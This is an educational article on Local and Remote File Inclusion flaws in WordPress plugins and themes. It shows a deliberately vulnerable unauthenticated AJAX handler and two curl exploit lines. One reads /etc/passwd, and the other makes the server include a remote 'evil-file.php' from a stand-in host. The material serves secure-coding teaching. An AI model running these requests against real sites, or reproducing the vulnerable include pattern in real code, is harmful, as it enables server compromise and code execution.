Local File Inclusion (LFI)

Introduction

This article covers cases of possible LFI on WordPress. This includes improper file inclusion inside of the plugin/theme which can be used to gain RCE on the server.

Learn how to secure your code against Local File Inclusion

Useful Functions

Several functions could be useful to identify a possible LFI vulnerability:

• include
• include_once
• require
• require_once

Example Cases

Below is an example of vulnerable code:

add_action("wp_ajax_nopriv_render_lesson", "render_lesson_template");

function render_lesson_template(){
    $template_path      = urldecode( $_GET['template_path'] ?? '' );

    // For custom template return all list of lessons
    include $template_path;
    die();
}

To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint specifying the needed parameter to trigger the include function.

curl <WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=render_lesson&template_path=/etc/passwd

Below are some of the findings related to Local File Inclusion:

• Critical Vulnerabilities Patched in REHub Theme and Plugin
• Security Vulnerability In OceanWP Theme <= 3.4.1
• Vulnerability In Rank Math SEO Plugin
• Multiple Critical Vulnerabilities Fixed In LearnPress Plugin Version <= 4.1.7.3.2

Remote File Inclusion

If both the PHP options allow_url_fopen and allow_url_include are turned on in the PHP configuration, a remote file inclusion is possible which allows an even easier access to executing arbitrary PHP code on the server. It allows a malicious user to add the remote PHP file to be executed leading to code execution unlike LFI where a local file needs to be available.

Example Cases

Similar to the above case, below is an example vulnerable scenario if the mentioned options are enabled in the PHP configuration:

add_action("wp_ajax_nopriv_render_lesson", "render_lesson_template");

function render_lesson_template(){
    $template_path      = urldecode( $_GET['template_path'] ?? '' );

    // For custom template return all list of lessons
    include $template_path;
    die();
}

To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint specifying the external link to the PHP code to trigger the include function.

curl <WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=render_lesson&template_path=https://example.com/evil-file.php